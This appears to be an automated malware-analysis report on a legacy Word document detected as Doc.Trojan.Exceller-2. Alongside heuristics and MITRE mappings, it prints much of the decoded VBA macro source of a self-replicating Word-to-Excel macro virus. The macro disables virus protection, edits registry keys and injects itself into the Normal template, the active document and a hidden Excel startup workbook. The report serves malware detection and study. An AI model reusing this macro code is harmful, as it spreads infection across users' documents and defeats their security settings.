MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a legacy Word document containing a malicious VBA macro. The AutoOpen macro attempts to disable security features and injects its code into the Normal template and the active document, likely to achieve persistence. It also attempts to write to registry keys related to Excel settings, potentially to further its persistence or execution.
Heuristics 7
-
ClamAV: Doc.Trojan.Exceller-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Exceller-2
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5635 bytes |
SHA-256: 8b448a4ec8f1faec3abaa97d50a4460f634b652536328d699069039ce3d1cb7e |
|||
|
Detection
ClamAV:
Doc.Trojan.Exceller-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Cross"
Public Const ModulName = "Cross"
Public Declare Function SetCursorPos Lib "user32" _
(ByVal x As Long, ByVal y As Long) As Long
Public Declare Function GetCursorPos Lib "user32" _
(lpPoint As Maus) As Long
Public Declare Sub Sleep Lib "kernel32" _
(ByVal dwMilliseconds As Long)
Private Type Maus
Xpos As Long
Ypos As Long
End Type
Sub AutoOpen()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
CommandBars("View").Controls(6).Enabled = False
CommandBars("Format").Controls(12).Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
CommandBars("Tools").Controls(13).Enabled = False
CommandBars("Tools").Controls(14).Enabled = False
Application.DisplayAlerts = wdAlertsNone
Application.VBE.ActiveVBProject.VBComponents(ModulName).Export "c:\cross.sys"
Set Normal_ = NormalTemplate.VBProject.VBComponents
Set Active_ = ActiveDocument.VBProject.VBComponents
For i = 1 To Normal_.Count
If Normal_(i).Name = ModulName Then NormalIns = True
Next i
For j = 1 To Active_.Count
If Active_(j).Name = ModulName Then ActiveIns = True
Next j
If NormalIns = False Then
Normal_.Import "c:\cross.sys"
End If
If ActiveIns = False Then
Active_.Import "c:\cross.sys"
ActiveDocument.SaveAs ActiveDocument.FullName
End If
With Application.FileSearch
.LookIn = Application.Path
.FileName = "Workbook_.xls"
.SearchSubFolders = True
.Execute
If .FoundFiles.Count <> 0 Then ExcelInstalled = True
End With
If ExcelInstalled = False Then
Set Excelx = CreateObject("excel.application")
Excelx.Visible = False
Excelx.CommandBars("Tools").Controls(10).Enabled = False
Excelx.CommandBars("Tools").Controls(12).Enabled = False
Excelx.CommandBars("View").Controls(3).Enabled = False
Excelx.CommandBars("Window").Controls(3).Enabled = False
Excelx.CommandBars("Window").Controls(4).Enabled = False
Book = Excelx.Application.StartupPath & "\Workbook_.xls"
Set Workbookx = Excelx.Workbooks.Add
Workbookx.VBProject.VBComponents.Import "c:\cross.sys"
Excelx.ActiveWindow.Visible = False
Workbookx.SaveAs Book
Excelx.Quit
End If
If Day(Now()) = Int(Rnd * 31) Then mEarthquake
End Sub
Sub Auto_Open()
Application.OnSheetActivate = "Exceler"
End Sub
Sub Exceler()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents(ModulName).Export "c:\cross.sys"
With Application
.DisplayAlerts = False
.ScreenUpdating = False
.CommandBars("Tools").Controls(10).Enabled = False
.CommandBars("Tools").Controls(12).Enabled = False
.CommandBars("View").Controls(3).Enabled = False
.CommandBars("Window").Controls(3).Enabled = False
.CommandBars("Window").Controls(4).Enabled = False
End With
Set Active_ = ActiveWorkbook.VBProject.VBComponents
Book = Application.StartupPath & "\Workbook_.xls"
If UCase(Dir(Book)) <> "WORKBOOK_.XLS" Then
Workbooks.Add.SaveAs FileName:=Book, AddToMru:=False
Workbooks("Workbook_.xls").VBProject.VBComponents.Import "c:\cross.sys"
ActiveWindow.Visible = False
Workbooks("Workbook_.xls").Save
End If
For i = 1 To Active_.Count
If Active_(i).Name = ModulName Then Installed = True
Next
If Installed = False Then
Active_.Import "c:\cross.sys"
ActiveWorkbook.SaveAs FileName:=ActiveWorkbook.FullName, AddToMru:=False
End If
Set Wordx = CreateObject("word.application")
Wordx.Visible = False
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.